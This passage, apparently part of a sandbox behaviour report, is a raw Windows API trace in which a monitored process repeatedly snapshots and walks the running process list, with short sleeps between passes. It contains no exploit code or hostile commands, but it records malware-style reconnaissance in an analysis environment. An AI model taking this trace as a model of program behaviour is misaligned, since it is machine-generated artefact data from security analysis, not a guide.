lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0131.580] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0131.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0131.582] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0131.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0131.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0131.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0131.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0131.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0131.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0131.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0131.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0131.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0131.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0131.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0131.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0131.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0131.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0131.600] CloseHandle (hObject=0xbc) returned 1 [0131.600] Sleep (dwMilliseconds=0x12c) [0132.001] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0132.006] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0132.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0132.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.009] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0132.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0132.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0132.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0132.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0132.013] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.015] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0132.018] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.018] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0132.021] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.022] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0132.025] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0132.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0132.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0132.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0132.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0132.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0132.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0132.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0132.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0132.038] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0132.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0132.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0132.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0132.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0132.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0132.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0132.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0132.047] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0132.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0132.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0132.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0132.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0132.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0132.183] CloseHandle (hObject=0xc4) returned 1 [0132.183] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0132.189] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0132.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0132.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.193] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0132.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0132.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0132.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0132.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0132.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.202] 